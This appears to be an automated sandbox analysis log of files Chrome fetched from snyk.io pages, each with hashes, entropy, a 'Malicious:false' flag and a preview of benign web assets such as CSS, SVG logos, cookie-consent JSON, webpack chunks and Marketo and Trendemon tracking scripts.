                                                                                                                                                                                                                                                                                                              SHA-256:5DBAF0A4FF0F8AC8C1B67550EEE84390B089604FFAF71183E417636C7E183AC5
                                                                                                                                                                                                                                                                                                              SHA-512:3B889A1DB2E3D3184886111A1B20FC54E6F14B006DB29B1D92741AF5C0A5B8299E78CDF6939437915F2B350E0BFC781BB8E96D4119172FF0CD2CB178487D71E0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/css/16.22abfce0.chunk.css
                                                                                                                                                                                                                                                                                                              Preview:body{margin:0;padding:0}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):8160
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9031254910445083
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:hyra4iBhVLMSxnQbTqk2jX5Z7xvF0FDgpQQ:hyrSzMSxnQTqk2FZCDgpP
                                                                                                                                                                                                                                                                                                              MD5:157C7981E877D6F1581F2EBF718D2F2C
                                                                                                                                                                                                                                                                                                              SHA1:1C39C4B009E00AE68D63A0B64E1312B23FE9467B
                                                                                                                                                                                                                                                                                                              SHA-256:997576FD3049A0EBE50FD50B5ED3680BABC034046C15C5E51BCD456379F566B5
                                                                                                                                                                                                                                                                                                              SHA-512:BE7ECCBB215E77922179545C3564FB54CF03A789DCED07BE9BBEE2D7BB167BEA86CB73A548C0C7606441E5E7E10870831D09564E03DA45D39F2B267FE8FB09B4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1674598632/customer-logos/logo-twilio.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="160" height="48" viewBox="0 0 160 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_8331_28951)">.<path d="M23.3799 18.08C23.3799 19.061 23.089 20.02 22.544 20.8356C21.999 21.6513 21.2243 22.287 20.3179 22.6625C19.4116 23.0379 18.4144 23.1361 17.4522 22.9447C16.4901 22.7533 15.6063 22.2809 14.9126 21.5873C14.219 20.8936 13.7465 20.0098 13.5552 19.0477C13.3638 18.0855 13.462 17.0882 13.8374 16.1819C14.2128 15.2756 14.8486 14.5009 15.6642 13.9559C16.4799 13.4109 17.4389 13.12 18.4199 13.12C19.7327 13.1284 20.9895 13.6537 21.9179 14.582C22.8462 15.5104 23.3715 16.7671 23.3799 18.08ZM18.4199 24.96C17.4389 24.96 16.4799 25.2509 15.6642 25.7959C14.8486 26.3409 14.2128 27.1156 13.8374 28.0219C13.462 28.9282 13.3638 29.9255 13.5552 30.8877C13.7465 31.8498 14.219 32.7336 14.9126 33.4272C15.6063 34.1209 16.4901 34.5933 17.4522 34.7847C18.4144 34.9761 19.4116 34.8779 20.3179 34.5024C21.2243 34.127 21.999 33.4913 22.544 32.6756C23.089 31.86 23.3799 30.901 23.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):56
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9983733344003465
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:YJELTrzaEIGWZMREHJxr/4AL1:YQTiE3gRHD
                                                                                                                                                                                                                                                                                                              MD5:FCF6C185DD87C3BB654FDCC1368EF6AE
                                                                                                                                                                                                                                                                                                              SHA1:6C6811600CA6A3B4A2C4B9ED64A772503605E6DF
                                                                                                                                                                                                                                                                                                              SHA-256:A75D094CABA33AC05120819A5FD16B225BCD6CEDA6D4B507D6DAC56D3BBD4320
                                                                                                                                                                                                                                                                                                              SHA-512:8AEB96C48D2FDB416678102338D2C227457AFFFCEEF6640DA256C37AD43DF82B975EB540940D5083676D3D2961A962FAB6ECBA2F163439177005B97926C5F541
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"languagesAvailable":["en"],"editableLanguages":["en"]}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):7457
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.34297521532081
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:7iDQ7e1rjU7t+K4K8caBIsKcML42CRNcookG2SXTTev5:7roKlX3eSXTTeR
                                                                                                                                                                                                                                                                                                              MD5:E1FBAB4A7A2F1F4DB9C23112004E958A
                                                                                                                                                                                                                                                                                                              SHA1:DFC4F8DBFDFC8E3AFF41881145D7BABD2C914B9B
                                                                                                                                                                                                                                                                                                              SHA-256:293C213205CD107EC18A50AE1F8A7B79915117D162CC58701A575DEF7C295D39
                                                                                                                                                                                                                                                                                                              SHA-512:D97D5F13D61BDAB589DE2734DA87D603C3C8540D3EB2C9D8A98DA56093DA2E9CAFEFF55997335946F8A15AA5C26367D34AAC11ED3626D7998E0EFB704AB993E3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"labels":{"ALL":"All","BACK":"Back","CID_TITLE":"ID to request consent data","CNIL_DENY_LINK_TEXT":"Continue without accepting","COOKIE_REFRESH":"Cookie refresh","COOKIE_STORAGE":"Cookie storage","DETAILS":"Details","LANGUAGE_TOOLTIP":"Changes occur immediately after selection.","MOBILE_TCF_MAX_STORAGE_DURATION_TEXT":"The choices you make regarding the purposes and entities listed are saved in the local storage","MOBILE_TCF_MAX_STORAGE_DURATION_TITLE":"CMP Maximum Storage Duration","SUB_SERVICE":"Subservice","SUB_SERVICES":"Subservices","SUB_SERVICES_DESCRIPTION":"Below you can find all the services that are subordinate to this service. The current consent status of this service applies to all subservices.","THIRD_COUNTRY_TRANSFER":"Data Transfer to Third Countries","VENDORS_OUTSIDE_EU":"This vendor is transferring data outside the EU / EEA.","WEB_TCF_MAX_STORAGE_DURATION_TEXT":"The choices you make regarding the purposes and entities listed are saved in the local storage","WEB_TCF_MA
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3061), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3061
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.284732262485176
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:ibGgeGgZcg1k6OAUVt/XWu09u1uJ43isC5KS59NK7QWhGL2e2q+RYT:jZcd6OHfQu1usisUv0dtzg
                                                                                                                                                                                                                                                                                                              MD5:79D9FB10844EADC641A5175992FF698C
                                                                                                                                                                                                                                                                                                              SHA1:02F833169147BF0BF3CCE5C02DFC4361C9682889
                                                                                                                                                                                                                                                                                                              SHA-256:9CBB4289EE029679D4C76F2B9F68D533780036C891BFFDC594D6246DCAB556C8
                                                                                                                                                                                                                                                                                                              SHA-512:D2B0EE8B91632B8E4FE6695FD0F14394F2EC92230CD7A74223546B84B3B6EFDC23B793AC7310C85F17EAC1C51A9D2A259E089BD73C84DCB4A571D5F5036049AF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7724],{67724:function(l,i,e){e.r(i),e.d(i,{default:function(){return b}});var n=e(85893),o=e(45697),d=e.n(o),t=e(19026);e(17585);var a=e(15712),r=e(24982),s=e(34579),u=e(40070),v=e(44133),c=e(15020),m=e(6215),g=e(46275),f=e(52752),h=e(87257);function p(l){var i;let{action:e,className:o,colorScheme:d,description:c,graphicImage:g,icon:f,isCentered:h,miniHeader:p,stat:x}=l;return(0,n.jsxs)("div",{className:(0,v.Z)("max-w-content",h&&"txt-center",o),"data-component":"Text Grid Statistic",children:[!g&&f&&(0,n.jsx)(s.default,{icon:f,isCentered:h,className:"marg-b-small"}),g&&(0,n.jsx)("div",{className:(0,v.Z)("d-block p-relative w-full max-w-2 h-huge radius-small overflow-hidden marg-b-large",h?"marg-h-auto":"marg-h-none"),children:(0,n.jsx)(u.Z,{src:null==g?void 0:g.src,alt:null==g?void 0:g.alt,size:"huge",isCentered:h})}),(0,n.jsx)("p",{className:"txt-headline-large txt-theme-gradient",children:x}),p&&(0,n.jsx)(a.Z,{as:
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):699
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.079570260069407
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:15RGidsk6n/GBw+C1WBNgqtu3XnxsSGlRdqbCDRWUkEHNj0vs3/tZb:/1sN7r+NZuHZGwmRWUnHZ0M/tZb
                                                                                                                                                                                                                                                                                                              MD5:51BDBE69AC61A93FB4878FB7D8CFCC64
                                                                                                                                                                                                                                                                                                              SHA1:5F4D6AE91DE6E5AAF58D19582B2D0B5B9CC4FA2D
                                                                                                                                                                                                                                                                                                              SHA-256:CBB87CD785B3599A96CC30DCC28DDB284226B85F354A44E71F510BFE8E07E1F5
                                                                                                                                                                                                                                                                                                              SHA-512:62812D48EF4B581867F1E0D7E2A3CAA13F03F0E8BF017FA24CFE58091D4FFE73AAA72500736DAFC59ABEBB642F2F860F99D058225FD40A347A4ADE966496D719
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/scripts/trendemon.js
                                                                                                                                                                                                                                                                                                              Preview:TRD_ACC_ID = typeof document !== 'undefined' ? parseInt(document?.querySelector('script[id="trendemon-script"]')?.getAttribute('data-id')) : null;.if (TRD_ACC_ID) {..// console.log('Trendemon Running');..(function (w, d) {...function go() {....var trdti = setInterval(function () {.....if (document.readyState === 'complete') {......var bi = document.createElement('script');......bi.type = 'text/javascript';......bi.async = true;......bi.src = 'https://assets.trendemon.com/tag/trends.min.js';......bi.id = 'trdflame';......var s = document.getElementsByTagName('script')[0];......s.parentNode.insertBefore(bi, s);......clearInterval(trdti);.....}....}, 500);...}...go();..})(window, document);.}.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (51619), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):51642
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.147401120253968
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:+Q9JeV+ArVHyH6EMVvpxl+fm9re9PE8waMe:hKSHaXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:3A8D4E0F5FC5A96861FEEFAB18BE6A6B
                                                                                                                                                                                                                                                                                                              SHA1:4F31A370D3717F9CFF51B9DED9B58EBFE0A6BB54
                                                                                                                                                                                                                                                                                                              SHA-256:5D07AB9E1430826E8813040CCAC5D68C17C85E35183C5D4215A4F38671D88C10
                                                                                                                                                                                                                                                                                                              SHA-512:A7D86904B772B96A64EBE793932E252EEBC4E9FCD1DF7447D0750D7FDFE72FACA812D321A8689EED0A7F347A6DA4C371A41B8F1ED49FF39A447C0A143058F280
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5MPyv02nAnOs2vZxTtINIG","type":"Entry","createdAt":"2022-11-09T21:48:22.179Z","updatedAt":"2024-07-24T13:59:39.232Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":35,"revision":7,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Snyk for Government page","title":"Snyk for Government | Snyk","slug":"government-security-solution","uri":"government-security-solution","seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7MV4tcfqwZiDCp6kkznUOP","type":"Entry","createdAt":"2022-11-09T21:48:22.325Z","updatedAt":"2023-04-12T02:06:58.890Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":16,"re
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1961
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.752099580772157
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:YmTHfDUS31H3gqKWX1bq/aCGB6MMUsN7DLEbAlWuIQqt5nnwA5:tTpXg8X12/5CsN7DLMA9QhX
                                                                                                                                                                                                                                                                                                              MD5:640BC690CB418D6D421EAF272DAEAFF3
                                                                                                                                                                                                                                                                                                              SHA1:FD13A02624B174879D0B781736F589F4728BF8A1
                                                                                                                                                                                                                                                                                                              SHA-256:905A6E55DAA962EAF4191B6A13D22AB1072ED2C6AE57FAE625E64281D4617EEA
                                                                                                                                                                                                                                                                                                              SHA-512:37CA700FD020999D9DCF8E74D9AD84EEC71B40B01A2B48AD4C221C838BEC58C514D8BB85A03667E8A824E41831709E19BFD58AC891E279A85A328FB5E31282CD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="12.7808" x2="70.169" y1="3.99999" y2="17.4721"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#145deb"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="23.4167" x2="64.6667" y1="22" y2="61.5833"><stop offset="0" stop-color="#14b7eb"/><stop offset="1" stop-color="#145deb"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m29.1091 60.3503c.1246.0178.2511.0178.3757 0 .1247.0178.2512.0178.3758 0 4.1422-1.3956 7.7027-3.1691 10.7013-5.3503h-11.0619c-2.4853 0-4.5-2.0147-4.5-4.5v-27c0-2.4853 2.0147-4.5 4.5-4.5h23.4685v-6.7361c.0118-.2587-.0624-.5141-.2111-.7262-.1486-.2122-.3634-.3692-.6109-.4466l-22.3094-7.03708c-.2293-.07203-.4752-.07203-.7045 0l-22.30944 7.03708c-.24742.0774-.46222.2344-.6109.4466-.14869.2121-.22289.4675-.21103.7262v14.0741c0 17.9092 7.3
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (606)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):11133
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.520280429902031
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:aCrC821ch80emIm9Db2M4GqZQ0M7jLQn2RC6yQEU+9my8M8iJAP3A/pFd0Pa9Sl4:aC2VzmX2TGeQj7Ha2RahU+9my8M8iJ3/
                                                                                                                                                                                                                                                                                                              MD5:EA7826F34518D7C2295738F39C7640FA
                                                                                                                                                                                                                                                                                                              SHA1:0095729B4BC2A580E4CE033993DAFE498DB87DF5
                                                                                                                                                                                                                                                                                                              SHA-256:68CC280CE370C6F1F51A4FC5950103FC38DF80A429552C549ADD04EBD8BD3A23
                                                                                                                                                                                                                                                                                                              SHA-512:E371BB3BAB334509BAA629DE564D37EBC7CA3CDDF059E33FE394A90856394AB318B26133D10BF9D3E47D83449F3C8242724C7850F58DC94A8F834666ACECD321
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:/*. * Copyright (c) 2007-2023, Marketo, Inc. All rights reserved.. * See https://developers.marketo.com/MunchkinLicense.pdf for license terms. * Marketo marketing automation web activity tracking script. * Version: 163 r896. */. (function(l){if(!l.MunchkinTracker){var h=l.document,p=h.location,C=encodeURIComponent,y=!1,q=null,t=null,D=!1,v=null,E=[],u=function(b,a,c,d){try{var e=function(){try{c.apply(this,arguments)}catch(a){}};b.addEventListener?b.addEventListener(a,e,d||!1):b.attachEvent&&b.attachEvent("on"+a,e);E.push([b,a,e,d])}catch(f){}},U=function(b,a,c,d){try{b.removeEventListener?b.removeEventListener(a,c,d||!1):b.detachEvent&&b.detachEvent("on"+a,c)}catch(e){}},e=function(b){return"undefined"!==typeof b&&null!==.b},F=function(b,a){return b.className.match(RegExp("(\\s|^)"+a+"(\\s|$)"))},V=e(l.XMLHttpRequest)&&e((new l.XMLHttpRequest).withCredentials),s=function(b){var a=null,c;if(e(b))if(0===b.length)a="";else try{a=decodeURIComponent(b)}catch(d){c=b.indexOf("?");if(-1!==c)t
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6130), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):6130
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.322330260957124
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:CGAV18Q2IKhnQYpe8guQesm2bwTxmPnzadyXv9kZhkkA:C5VAxh08gJeUBPnedivWrkL
                                                                                                                                                                                                                                                                                                              MD5:14ECB509B1C65315B19DDBA87D8D8C4E
                                                                                                                                                                                                                                                                                                              SHA1:E6FEE5A0D9056A7D660A141FE0CA0DE7424BA227
                                                                                                                                                                                                                                                                                                              SHA-256:73B36FAA00DC82F45CFCE91FA262899ACB4960815752ECF11567F475F46E9592
                                                                                                                                                                                                                                                                                                              SHA-512:7A41EAD4D3A0F49AE312EF098E9DD7DE46B15812E6C0EA8B0DE7F25521FA5F6646D84C7B25450025F6475814BD980F556F9B71FB310AD913659BEFBCEE8C8213
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/6316.a120450673078999.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6316],{61375:function(l,e,i){i.d(e,{Q:function(){return o}});let o=l=>{let e=l.trim().split(" ");return e.reduce((l,i,o)=>((0===o||o===e.length-1)&&(l="".concat(l).concat(i.charAt(0).toUpperCase())),l),"")}},32026:function(l,e,i){i.d(e,{Z:function(){return c}});var o=i(85893),n=i(45697),a=i.n(n),d=i(7756),s=i(44133),r=i(61375);let t={"extra-small":18,small:24,medium:32,large:84,huge:140};function u(l){var e,i;let{name:n,size:a="small",as:u="div",shape:c="circular",src:v,hasShadow:m,style:h,className:g,...p}=l;return(0,o.jsx)(u,{className:(0,s.Z)("avatar min-w-medium",a&&"avatar-".concat(a),!v&&"no-image","rounded"===c&&"radius-large","circular"===c&&"radius-full",m&&"shadow-mid",g),style:h,"data-name":n&&(0,r.Q)(n),"data-component":"Avatar",children:v&&(0,o.jsx)(d.Z,{src:v,alt:null!=n?n:"",width:null!==(e=t[a])&&void 0!==e?e:24,height:null!==(i=t[a])&&void 0!==i?i:24,...p})})}u.propTypes={alt:a().string,as:a().oneOf(
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65485), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):180028
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1422472273535496
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:6wp1e+QvSB4bjBjqCvcuUrALug8pTquTsIt7RBBbYLA5tjLNzAXm8v2MrDXcc6/y:6wp1eyVrSHCG
                                                                                                                                                                                                                                                                                                              MD5:22B486FA763A26D544B9DCA9FC22B01F
                                                                                                                                                                                                                                                                                                              SHA1:F81AE4B3216D66D206B520FFE57C3F0A9F12AEB2
                                                                                                                                                                                                                                                                                                              SHA-256:AC7F65F369B4A10A8FCD88D8BFF34FA1878C6950F193A42BEF407A7D0CAEA355
                                                                                                                                                                                                                                                                                                              SHA-512:C3CFB2690F05C3AB1A8F717DBB85801071C6E6B64CB3BA42B5D21481B8AF4897FB9959356430823496F10A8C2F636821B3DF6C4E74F6D2383ACA35C6552DBF84
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6fCjccMs0rtHyx8XXo4eIr","type":"Entry","createdAt":"2022-10-20T15:57:14.006Z","updatedAt":"2024-09-06T19:20:37.256Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":87,"revision":12,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Snyk Code product page","title":"Snyk Code | Snyk","slug":"snyk-code","uri":"product/snyk-code","pageLocalization":["de","ja","fr","pt-BR"],"contentTags":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2PrbrUOIuwpqXpocI2SGSe","type":"Entry","createdAt":"2022-10-21T21:36:51.636Z","updatedAt":"2023-11-13T19:33:36.274Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":9,"revis
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (50704), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):50718
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.133671543409582
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:fzyzw/eXRDiastciudceNTRD/MiEMVvpxl+fm9re9PE8waMe:fzyzw/eXRDiastciMc6D/MCXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:7CC2246F925A9EE4E3007D860E1B1094
                                                                                                                                                                                                                                                                                                              SHA1:5C47975C53F100C87B002219A19A2B04725ED0E2
                                                                                                                                                                                                                                                                                                              SHA-256:700A69456DCACCF3088F0E72AA112866AF186E062955C1BB066295BBED5F4502
                                                                                                                                                                                                                                                                                                              SHA-512:30972C8CE6063F511FC1F1A654000B28B740DEA44C57C209C6F32DDE5855ECBE5670C5AABA8D67D35A003462CF18CC5A7297A2FEF4EFE621B9F1DA750A98A7A9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4IUtppRPSmdrRQGTPEBkMl","type":"Entry","createdAt":"2022-11-22T20:03:08.041Z","updatedAt":"2023-09-22T17:15:45.765Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":28,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Conversion page - Contact us","title":"Contact us | Snyk","slug":"contact-us","uri":"contact-us","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"1fYnA1RNg17Mz5O1wwKpFP","type":"Entry","createdAt":"2022-11-22T18:28:19.569Z","updatedAt":"2023-08-17T01:26:30.785Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":24,
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (33094), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):33094
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.271194779008479
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:+MT7wsVvhAfNL2hzOtDENEhe2xZc9KhvpcFvRrfVBejwX:+M/wsVvhAfNL2CEQbc9KVpcFvFVB6y
                                                                                                                                                                                                                                                                                                              MD5:D8739A9FE9A3A42936F5CD86C8727494
                                                                                                                                                                                                                                                                                                              SHA1:4FB60EC9F1C4EFF985C219BF24E4B1F340D62C97
                                                                                                                                                                                                                                                                                                              SHA-256:8F0F8792237470EE661C6AFC32CA68200DD74BCC0D544D0FD54C7777AF362EAE
                                                                                                                                                                                                                                                                                                              SHA-512:3326F37AE1DB03E06E8A1EC7E0B39D4F055C55E0B2DE6386F0677250A48B0146A081B3E17B42E01C194F0CD3FA5B63871FAE86478891644EA41BA1747A647EE5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[22],{"+OSO":function(t,n,e){"use strict";e.d(n,"a",function(){return createClientReportEnvelope});var r=e("8dVd"),i=e("xqFT");function createClientReportEnvelope(t,n,e){var o=[{type:"client_report"},{timestamp:e||Object(i.a)(),discarded_events:t}];return Object(r.c)(n?{dsn:n}:{},[o])}},"/brt":function(t,n,e){"use strict";e.d(n,"a",function(){return severityLevelFromString});var r=["fatal","error","warning","log","info","debug"];function severityLevelFromString(t){return"warn"===t?"warning":r.includes(t)?t:"log"}},"26VM":function(t,n,e){"use strict";e.d(n,"a",function(){return isDOMError}),e.d(n,"b",function(){return isDOMException}),e.d(n,"c",function(){return isElement}),e.d(n,"d",function(){return isError}),e.d(n,"e",function(){return isErrorEvent}),e.d(n,"f",function(){return isEvent}),e.d(n,"g",function(){return isInstanceOf}),e.d(n,"h",function(){return isNaN}),e.d(n,"i",function(){return isPlainObject}),e.d(n,"j",function(){ret
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (23811), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):23813
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1377975739219055
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:nbJDWb1kFkmfix3WxRaXRlwEX2lEXyAr6aAQx/2dW+ZUcHe:bJDWb1kFHfiF0s4F4yAr6aTxie
                                                                                                                                                                                                                                                                                                              MD5:8F0E89EDDA3C6658DA3995CC9D38B585
                                                                                                                                                                                                                                                                                                              SHA1:25E18C47289B065FF7328DD3F9D2E42ACFAFC77D
                                                                                                                                                                                                                                                                                                              SHA-256:5A15E19F5A3F18DA7E2E9A2FEB3A612663E0A74FC411BBD1B6D1DE1A0C56DE5C
                                                                                                                                                                                                                                                                                                              SHA-512:8E3F98289BA63922DA574B5E8BD60E4CB2917872E203FC14DA81186C35589277274AE175F786AF2349C98D9E73B7090F96A14477F2E07ABCF5617D9163B46AE5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
